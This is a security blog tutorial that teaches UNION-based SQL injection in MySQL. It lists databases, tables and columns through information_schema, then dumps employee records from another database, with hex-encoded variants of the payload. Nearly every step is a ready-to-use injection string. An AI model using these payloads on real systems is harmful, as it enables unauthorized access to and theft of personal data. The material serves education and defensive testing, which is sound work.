A technique that a lot of SQL injection beginners don’t know | Atmanand Nagpure write-up

Atmanand Nagpure
Mar 21, 2019 · 5 min read

Hey there! Back again with another article about SQL Injection techniques.
So, I’ve been seeing a lot of beginners in SQL Injection. While they try to extract data from the database, they ignore the fact that they can do better.
Note that I don’t have any bad intention to destroy any website or any organization. This post is only for educational purposes.

The problem:

The problem with beginners is, they extract data only from the current database in which the vulnerable query is getting executed. They don’t even try to access other databases and their content. So, a lot of intermediate and advanced SQL injectors might be aware of the fact that if the query is executed with proper privileges, the attacker can access other databases on that SQL server.
So, let’s actually take a look at how it’s actually done.

The Solution:

Image for post
Image for post
LeT’s SQL iNjEcT!!!

Step 1:

Well, the first part of exploitation sequence is to extract the names of databases present on the server. This can be done quite easily actually using group concatenation and union select.

So, let’s extract database names on the server.

Query: ?param=’ AND 1=2 UNION ALL SELECT 1,(SELECT CAST(GROUP_CONCAT(schema_name,0x0a) as CHAR(4096)) FROM (SELECT * FROM information_schema.schemata)a),3,4,5,6,7,8,9 -- -

Explanation:

There are 9 columns in the table of the original query. You can find it out using the ORDER BY technique. So, I wrote UNION ALL select 1,2,3,4,5,6,7,8,9 and extracted data at position 2 and replaced it by own nested SELECT query.

GROUP_CONCAT() function is used to concatenate all the rows of the returned result. Here I used nested select. In the inner SELECT statement, I selected all the rows in the information_schema.schemata table.
information_schema.schemata is a table in which all the names and other information of the databases present on that server are stored.

I performed an explicit type cast on the GROUP_CONCAT() result to increase the result buffer size to store and show more result. You can use LIMIT m,n in MySQL and some other servers to return rows within a range of m and n.

Result 1:

Image for post
Image for post
Databases present on the server.

Step 2:

Image for post
Image for post
SqL iNjeCtIoN: tAbLeS AnD sHiT BrOoo!

So, the next thing to do is to extract table names from the database of our choice.
Let’s extract tables from a database named ‘training’. Here’s how we’ll do it:

Query: ' AND 1=2 UNION ALL SELECT 1,(SELECT CAST(GROUP_CONCAT(table_name,0x0a) as CHAR(4096)) FROM (SELECT * FROM information_schema.tables WHERE table_schema='training')a),3,4,5,6,7,8,9 -- -

Result 2:

Image for post
Image for post
Tables present in database ‘training’

Step 3:

Image for post
Image for post
iT’s CoMiNg pEoPle!!!

Next, we’ll extract column names from the table of our choice. We can do it in different ways like Dump-in-one-shot(DIOS) SQL injection. But for the sake of keeping things simple and starter-friendly let’s just stick to the basic and easy stuff.

Let’s extract column names from the table named ‘start_15_users’ using the following query:

Query: ' AND 1=2 UNION ALL SELECT 1,(SELECT CAST(GROUP_CONCAT(column_name,0x0a) as CHAR(4096)) FROM (SELECT * FROM information_schema.columns WHERE table_name='start_15_users')a),3,4,5,6,7,8,9 -- -

Result 3:

Image for post
Image for post
Column Names extracted from table named ‘start_15_users’

And here comes the beginner problem:

Many beginners don’t know how they can extract data from a different database.
The Structured Query Languages(SQL) provides a feature to get data from a different database. The ‘. (dot) operation.

Usage:

SELECT * from database_name.table_name;

This is that simple. But, most of the beginners still don’t know this technique.


Final Step:

Image for post
Image for post
We gOt iT PeOpLe!!!

So, let’s actually get data from the table named ‘start_15_users’.

Queries:

' AND 1=2 UNION ALL SELECT 1,(SELECT CAST(GROUP_CONCAT("UserId:",UserID,0x3a,"EmpCode:",EmpCode,0x3a,"DOB:",DOB,0x3a,"IsActive:",IsActive,0x0a) as CHAR(4096)) FROM (SELECT * FROM training.start_15_users)a),3,4,5,6,7,8,9 -- -

is the same as:

' AND 1=2 UNION ALL SELECT 1,(SELECT CAST(GROUP_CONCAT(0x5573657249443a,UserID,0x3a,0x456d70436f64653a,EmpCode,0x3a,0x444f423a,DOB,0x3a,0x49734163746976653a,IsActive,0x0a) as CHAR(4096)) FROM (SELECT * FROM training.start_15_users)a),3,4,5,6,7,8,9 -- -

is the same as:

' AND 1=2 UNION ALL SELECT 1,(SELECT CAST(GROUP_CONCAT(0x55,0x73,0x65,0x72,0x49,0x64,0x3a,UserID,0x3a,0x45,0x6d,0x70,0x43,0x6f,0x64,0x65,0x3a,EmpCode,0x3a,0x44,0x4f,0x42,0x3a,DOB,0x3a,0x49,0x73,0x41,0x63,0x74,0x69,0x76,0x65,0x3a,IsActive,0x0a) as CHAR(4096)) FROM (SELECT * FROM training.start_15_users)a),3,4,5,6,7,8,9 -- -

Final Result:

Image for post
Image for post
Final data extracted from the table named ‘start_15_users’

Final Notes:


That’s all for today!
Thank you for reading!

Regards,
Atmanand Nagpure (proghax333)

My other post:
.
NET SQL Injection through errors: https://medium.com/@skillzworldtech/sql-injection-data-extraction-through-net-framework-error-ec9972858321


InfoSec Write-ups

A collection of write-ups from the best hackers in the…

Atmanand Nagpure

Written by

Aka. proghax333 | Hacker | Software Developer | Security Researcher | Music Producer | Sound Designer Wanna explore everything!💗

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Atmanand Nagpure

Written by

Aka. proghax333 | Hacker | Software Developer | Security Researcher | Music Producer | Sound Designer Wanna explore everything!💗

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch

Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore

Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store